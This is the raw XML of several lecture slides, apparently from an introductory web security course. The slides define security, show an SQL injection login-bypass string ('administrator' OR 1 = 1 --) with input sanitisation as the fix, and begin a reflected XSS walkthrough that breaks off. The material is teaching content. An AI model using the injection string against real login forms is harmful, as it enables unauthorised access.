              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>SELECT * FROM users WHERE name = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>’ OR 1 = 1  - -  and password = ‘Urbano’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>How can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>kind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>fixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>? One of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>solutions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> be to do an «input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>sanification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>» to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>recognize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> like ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73918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5083B-CC27-4F1C-AD03-E3DBEC1C9E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Security: an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>informal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>definition</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto contenuto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{125E40B9-054F-4D79-BD17-68E71C740D01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592421" y="1565841"/>
            <a:ext cx="9131100" cy="4592592"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t>«To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>entities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> take actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t> to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0" err="1"/>
              <a:t>done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="6000" dirty="0"/>
              <a:t>.»</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva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rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3640701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4CE46895-420F-4AF0-9BC8-AFAFF1FF62C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB5F809-91CF-4043-B5A2-FAF8FD833C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="432000"/>
            <a:ext cx="11455200" cy="432000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> look to exploits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="CasellaDiTesto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9986F6C6-BB7C-4575-92B6-375CEF28FA79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="1194955"/>
            <a:ext cx="9200373" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> one of XSS (Cross Site Scripting) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>variants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>actor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to hit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a link to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> website.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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>arises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> website (e.g. a banking website) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the data from the http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>bad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> way.</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Lets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>kind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> e-commerce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>provides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>form</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Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> assume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>inserts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>‘pippo’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> box and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>let’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a look to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>manner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>deals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>string</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901150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62C4B168-E05D-4493-948C-76A622D36523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38A7A941-F26B-4F5A-B12D-2A553B70F413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="432000"/>
            <a:ext cx="11101909" cy="432000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> look to exploits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (PT. 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF5252C9-9A3C-4822-B297-72BE93DE5817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="25653" r="18864" b="23063"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="516082" y="1025320"/>
            <a:ext cx="5579918" cy="3525289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA32F16-5DA2-4380-8C07-1B0121542871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516082" y="4738255"/>
            <a:ext cx="9376063" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>As</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, the web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the html page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>appears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>request</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What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
